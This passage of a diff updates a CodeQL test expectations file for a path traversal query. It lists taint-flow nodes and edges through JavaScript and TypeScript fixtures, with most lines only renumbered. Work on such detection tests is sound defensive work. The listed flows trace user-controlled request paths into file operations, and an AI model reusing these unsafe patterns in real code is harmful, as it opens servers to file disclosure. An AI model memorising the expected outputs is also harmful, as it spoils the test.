TaintedPath.js:139:19:139:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | -| TaintedPath.js:139:33:139:37 | split | semmle.label | split | -| TaintedPath.js:140:19:140:27 | concatted | semmle.label | concatted | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | semmle.label | concatted.join("/") | -| TaintedPath.js:142:7:142:39 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:142:20:142:24 | split | semmle.label | split | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | -| TaintedPath.js:143:19:143:28 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | -| TaintedPath.js:145:19:145:23 | split | semmle.label | split | -| TaintedPath.js:145:19:145:29 | split.pop() | semmle.label | split.pop() | -| TaintedPath.js:150:7:150:48 | path | semmle.label | path | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:150:24:150:30 | req.url | semmle.label | req.url | -| TaintedPath.js:154:29:154:32 | path | semmle.label | path | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:160:29:160:32 | path | semmle.label | path | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:161:29:161:32 | path | semmle.label | path | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:162:29:162:32 | path | semmle.label | path | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:163:29:163:32 | path | semmle.label | path | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | -| TaintedPath.js:178:40:178:43 | path | semmle.label | path | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | -| TaintedPath.js:179:50:179:53 | path | semmle.label | path | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | -| TaintedPath.js:187:38:187:44 | req.url | semmle.label | req.url | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | -| TaintedPath.js:188:51:188:57 | req.url | semmle.label | req.url | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | -| TaintedPath.js:190:44:190:50 | req.url | semmle.label | req.url | -| TaintedPath.js:195:7:195:48 | path | semmle.label | path | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:195:24:195:30 | req.url | semmle.label | req.url | -| TaintedPath.js:196:31:196:34 | path | semmle.label | path | -| TaintedPath.js:197:45:197:48 | path | semmle.label | path | -| TaintedPath.js:198:35:198:38 | path | semmle.label | path | -| TaintedPath.js:202:7:202:48 | path | semmle.label | path | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:202:24:202:30 | req.url | semmle.label | req.url | -| TaintedPath.js:206:29:206:32 | path | semmle.label | path | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:211:7:211:48 | path | semmle.label | path | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:211:24:211:30 | req.url | semmle.label | req.url | -| TaintedPath.js:213:29:213:32 | path | semmle.label | path | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:216:31:216:34 | path | semmle.label | path | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:11:29:11:32 | path | semmle.label | path | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | +| TaintedPath.js:13:45:13:48 | path | semmle.label | path | +| TaintedPath.js:16:33:16:36 | path | semmle.label | path | +| TaintedPath.js:19:33:19:36 | path | semmle.label | path | +| TaintedPath.js:22:33:22:36 | path | semmle.label | path | +| TaintedPath.js:31:31:31:34 | path | semmle.label | path | +| TaintedPath.js:36:3:36:44 | path | semmle.label | path | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:36:20:36:26 | req.url | semmle.label | req.url | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:39:48:39:51 | path | semmle.label | path | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | +| TaintedPath.js:42:45:42:48 | path | semmle.label | path | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:43:51:43:54 | path | semmle.label | path | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:44:50:44:53 | path | semmle.label | path | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| TaintedPath.js:45:52:45:55 | path | semmle.label | path | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | +| TaintedPath.js:46:49:46:52 | path | semmle.label | path | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:47:48:47:51 | path | semmle.label | path | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:48:54:48:57 | path | semmle.label | path | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | +| TaintedPath.js:49:57:49:60 | path | semmle.label | path | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:54:31:54:76 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:54:63:54:69 | req.url | semmle.label | req.url | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:55:31:55:74 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:55:61:55:67 | req.url | semmle.label | req.url | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:56:31:56:73 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:56:60:56:66 | req.url | semmle.label | req.url | +| TaintedPath.js:64:48:64:60 | req.params[0] | semmle.label | req.params[0] | +| TaintedPath.js:73:6:73:47 | path | semmle.label | path | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:73:23:73:29 | req.url | semmle.label | req.url | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | +| TaintedPath.js:75:44:75:47 | path | semmle.label | path | +| TaintedPath.js:76:14:76:17 | path | semmle.label | path | +| TaintedPath.js:77:32:77:39 | realpath | semmle.label | realpath | +| TaintedPath.js:78:45:78:52 | realpath | semmle.label | realpath | +| TaintedPath.js:109:6:109:47 | path | semmle.label | path | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:109:23:109:29 | req.url | semmle.label | req.url | +| TaintedPath.js:111:23:111:26 | path | semmle.label | path | +| TaintedPath.js:115:7:115:48 | path | semmle.label | path | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:115:24:115:30 | req.url | semmle.label | req.url | +| TaintedPath.js:117:19:117:22 | path | semmle.label | path | +| TaintedPath.js:119:7:119:29 | split | semmle.label | split | +| TaintedPath.js:119:15:119:18 | path | semmle.label | path | +| TaintedPath.js:119:15:119:29 | path.split("/") | semmle.label | path.split("/") | +| TaintedPath.js:121:19:121:23 | split | semmle.label | split | +| TaintedPath.js:121:19:121:33 | split.join("/") | semmle.label | split.join("/") | +| TaintedPath.js:125:19:125:23 | split | semmle.label | split | +| TaintedPath.js:125:19:125:26 | split[x] | semmle.label | split[x] | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | semmle.label | prefix + split[x] | +| TaintedPath.js:126:28:126:32 | split | semmle.label | split | +| TaintedPath.js:126:28:126:35 | split[x] | semmle.label | split[x] | +| TaintedPath.js:128:7:128:38 | concatted | semmle.label | concatted | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | +| TaintedPath.js:128:33:128:37 | split | semmle.label | split | +| TaintedPath.js:129:19:129:27 | concatted | semmle.label | concatted | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | semmle.label | concatted.join("/") | +| TaintedPath.js:131:7:131:39 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:131:20:131:24 | split | semmle.label | split | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | +| TaintedPath.js:132:19:132:28 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | +| TaintedPath.js:134:19:134:23 | split | semmle.label | split | +| TaintedPath.js:134:19:134:29 | split.pop() | semmle.label | split.pop() | +| TaintedPath.js:139:7:139:48 | path | semmle.label | path | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:139:24:139:30 | req.url | semmle.label | req.url | +| TaintedPath.js:143:29:143:32 | path | semmle.label | path | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:149:29:149:32 | path | semmle.label | path | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:150:29:150:32 | path | semmle.label | path | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:151:29:151:32 | path | semmle.label | path | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:152:29:152:32 | path | semmle.label | path | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | +| TaintedPath.js:167:40:167:43 | path | semmle.label | path | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | +| TaintedPath.js:168:50:168:53 | path | semmle.label | path | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | +| TaintedPath.js:176:38:176:44 | req.url | semmle.label | req.url | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | +| TaintedPath.js:177:51:177:57 | req.url | semmle.label | req.url | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | +| TaintedPath.js:179:44:179:50 | req.url | semmle.label | req.url | +| TaintedPath.js:184:7:184:48 | path | semmle.label | path | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:184:24:184:30 | req.url | semmle.label | req.url | +| TaintedPath.js:185:31:185:34 | path | semmle.label | path | +| TaintedPath.js:186:45:186:48 | path | semmle.label | path | +| TaintedPath.js:187:35:187:38 | path | semmle.label | path | +| TaintedPath.js:191:7:191:48 | path | semmle.label | path | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:191:24:191:30 | req.url | semmle.label | req.url | +| TaintedPath.js:195:29:195:32 | path | semmle.label | path | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:200:7:200:48 | path | semmle.label | path | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:200:24:200:30 | req.url | semmle.label | req.url | +| TaintedPath.js:202:29:202:32 | path | semmle.label | path | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:205:31:205:34 | path | semmle.label | path | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | | examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | | examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | semmle.label | ROOT + filePath | -| examples/TaintedPath.js:11:36:11:43 | filePath | semmle.label | filePath | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | semmle.label | ROOT + filePath | +| examples/TaintedPath.js:10:36:10:43 | filePath | semmle.label | filePath | | express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | | handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | | handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | @@ -440,22 +440,22 @@ nodes | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | | tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | | tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | -| tainted-require.js:7:19:7:37 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:12:29:12:47 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:14:11:14:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:6:19:6:37 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:11:29:11:47 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:13:11:13:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | semmle.label | req.param("gimme") | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | -| tainted-sendFile.js:24:37:24:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:25:34:25:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:33:37:33:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:35:34:35:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | +| tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | @@ -504,158 +504,158 @@ nodes | typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | -| typescript.ts:12:29:12:32 | path | semmle.label | path | -| typescript.ts:20:7:20:18 | path3 | semmle.label | path3 | -| typescript.ts:20:15:20:18 | path | semmle.label | path | -| typescript.ts:21:39:21:43 | path3 | semmle.label | path3 | -| typescript.ts:23:7:23:18 | path4 | semmle.label | path4 | -| typescript.ts:23:15:23:18 | path | semmle.label | path | -| typescript.ts:24:39:24:43 | path4 | semmle.label | path4 | -| typescript.ts:30:7:30:18 | path6 | semmle.label | path6 | -| typescript.ts:30:15:30:18 | path | semmle.label | path | -| typescript.ts:32:29:32:33 | path6 | semmle.label | path6 | +| typescript.ts:11:29:11:32 | path | semmle.label | path | +| typescript.ts:19:7:19:18 | path3 | semmle.label | path3 | +| typescript.ts:19:15:19:18 | path | semmle.label | path | +| typescript.ts:20:39:20:43 | path3 | semmle.label | path3 | +| typescript.ts:22:7:22:18 | path4 | semmle.label | path4 | +| typescript.ts:22:15:22:18 | path | semmle.label | path | +| typescript.ts:23:39:23:43 | path4 | semmle.label | path4 | +| typescript.ts:29:7:29:18 | path6 | semmle.label | path6 | +| typescript.ts:29:15:29:18 | path | semmle.label | path | +| typescript.ts:31:29:31:33 | path6 | semmle.label | path6 | | views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | edges -| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:10:41:10:44 | path | provenance | | +| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:9:41:9:44 | path | provenance | | | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | provenance | Config | | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | provenance | Config | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | TaintedPath-es6.js:7:7:7:44 | path | provenance | | | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | provenance | Config | -| TaintedPath-es6.js:10:41:10:44 | path | TaintedPath-es6.js:10:26:10:45 | join("public", path) | provenance | Config | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:12:29:12:32 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:15:45:15:48 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:18:33:18:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:21:33:21:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:24:33:24:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:33:31:33:34 | path | provenance | | +| TaintedPath-es6.js:9:41:9:44 | path | TaintedPath-es6.js:9:26:9:45 | join("public", path) | provenance | Config | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:11:29:11:32 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:13:45:13:48 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:16:33:16:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:19:33:19:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:22:33:22:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:31:31:31:34 | path | provenance | | | TaintedPath.js:9:14:9:37 | url.par ... , true) | TaintedPath.js:9:14:9:43 | url.par ... ).query | provenance | Config | | TaintedPath.js:9:14:9:43 | url.par ... ).query | TaintedPath.js:9:14:9:48 | url.par ... ry.path | provenance | Config | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | TaintedPath.js:9:7:9:48 | path | provenance | | | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:9:14:9:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:15:45:15:48 | path | TaintedPath.js:15:29:15:48 | "/home/user/" + path | provenance | Config | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:42:48:42:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:46:45:46:48 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:48:51:48:54 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:50:50:50:53 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:52:52:52:55 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:54:49:54:52 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:56:48:56:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:58:54:58:57 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:60:57:60:60 | path | provenance | | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | TaintedPath.js:38:10:38:39 | url.par ... ).query | provenance | Config | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | TaintedPath.js:38:10:38:44 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | TaintedPath.js:38:3:38:44 | path | provenance | | -| TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:38:10:38:33 | url.par ... , true) | provenance | Config | -| TaintedPath.js:42:48:42:51 | path | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:46:45:46:48 | path | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | provenance | Config | -| TaintedPath.js:48:51:48:54 | path | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:50:50:50:53 | path | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:52:52:52:55 | path | TaintedPath.js:52:29:52:56 | pathMod ... , path) | provenance | Config | -| TaintedPath.js:54:49:54:52 | path | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | provenance | Config | -| TaintedPath.js:56:48:56:51 | path | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:58:54:58:57 | path | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:60:57:60:60 | path | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | provenance | Config | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | TaintedPath.js:65:31:65:76 | require ... ).query | provenance | Config | -| TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:70 | require ... eq.url) | provenance | Config | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | TaintedPath.js:66:31:66:74 | require ... ).query | provenance | Config | -| TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:68 | require ... eq.url) | provenance | Config | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | TaintedPath.js:67:31:67:73 | require ... ).query | provenance | Config | -| TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:67 | require ... eq.url) | provenance | Config | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:86:44:86:47 | path | provenance | | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:87:14:87:17 | path | provenance | | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | TaintedPath.js:84:13:84:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | TaintedPath.js:84:13:84:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | TaintedPath.js:84:6:84:47 | path | provenance | | -| TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:84:13:84:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:86:44:86:47 | path | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | provenance | Config | -| TaintedPath.js:87:14:87:17 | path | TaintedPath.js:88:32:88:39 | realpath | provenance | Config | -| TaintedPath.js:88:32:88:39 | realpath | TaintedPath.js:89:45:89:52 | realpath | provenance | | -| TaintedPath.js:120:6:120:47 | path | TaintedPath.js:122:23:122:26 | path | provenance | | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | TaintedPath.js:120:13:120:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | TaintedPath.js:120:13:120:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | TaintedPath.js:120:6:120:47 | path | provenance | | -| TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:120:13:120:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:128:19:128:22 | path | provenance | | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:130:15:130:18 | path | provenance | | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | TaintedPath.js:126:14:126:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | TaintedPath.js:126:14:126:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | TaintedPath.js:126:7:126:48 | path | provenance | | -| TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:126:14:126:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:132:19:132:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:136:19:136:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | 